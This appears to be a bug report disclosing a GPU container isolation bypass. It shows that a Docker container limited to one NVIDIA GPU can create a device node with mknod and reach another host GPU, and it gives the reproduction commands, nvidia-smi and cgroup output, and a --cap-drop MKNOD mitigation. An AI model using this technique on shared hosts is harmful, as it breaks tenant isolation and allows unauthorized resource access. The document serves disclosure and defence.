1. Issue description
A GPU container can break device isolation and gain access to other GPUs on the host.
2. Steps to reproduce the issue
Start a GPU container with only /dev/nvidia0 attached:
$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0 nvidia/cuda:10.1-runtime-ubuntu16.04 bash
The container can access the GPU as expected:
root@5f0921a756de:/# nvidia-smi
Wed Nov  4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0    |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
The devices cgroup setup, with c 195:0 rw for GPU0, is also as expected:
root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw
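For reference, the whitelisted entry can be compared against the node's actual device numbers (a hypothetical check, not part of the session above; stat prints them in hex, and 0xc3 is 195):
stat -c '%n: major=0x%t minor=0x%T' /dev/nvidia0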
BUT: if I create another GPU device file reusing GPU0's major/minor numbers, something unexpected happens.
root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0
The /dev/nvidia1 node is created successfully with nvidia0's device number:
root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236, 0 Oct 9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236, 1 Oct 9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195, 0 Oct 9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195, 0 Nov 4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct 9 01:32 /dev/nvidiactl
Unexpectedly, GPU1 is now listed by nvidia-smi:
root@5f0921a756de:/# nvidia-smi
Wed Nov  4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0    |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
Meanwhile, the devices cgroup whitelist does not change at all:
root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw
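As far as I can tell, this is because the devices cgroup matches only the device type and major:minor at open() time, never the file name: any node that reuses the whitelisted 195:0 passes the check, while a node carrying GPU1's real minor (typically 195:1) would still be denied. A rough comparison, hypothetical and not run in the session above:
mknod -m 666 /dev/nvidia1-real c 195 1   # creation itself is allowed by the "c *:* m" entry
head -c1 /dev/nvidia1-real               # open() should fail here with "Operation not permitted"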
I also ran a TensorFlow demo in the container, and both GPUs can indeed be used.
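Something like the following one-liner should report both devices (illustrative only, assuming TensorFlow 2.x is installed in the container; it is not the exact demo I ran):
python3 -c "import tensorflow as tf; print(tf.config.list_physical_devices('GPU'))"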
This problem can be avoided by adding --cap-drop MKNOD to docker run, but Docker containers have the MKNOD capability by default.
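For example, a mitigated run would look like this (same image and flags as above, only with the capability dropped):
$ docker run -it --cap-drop MKNOD -e NVIDIA_VISIBLE_DEVICES=0 nvidia/cuda:10.1-runtime-ubuntu16.04 bash
Inside such a container, mknod fails with "Operation not permitted", so the fake /dev/nvidia1 cannot be created in the first place.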
It looks like this operation can bypass the devices cgroup restriction and gain access to other GPUs on the host. This is a serious security risk.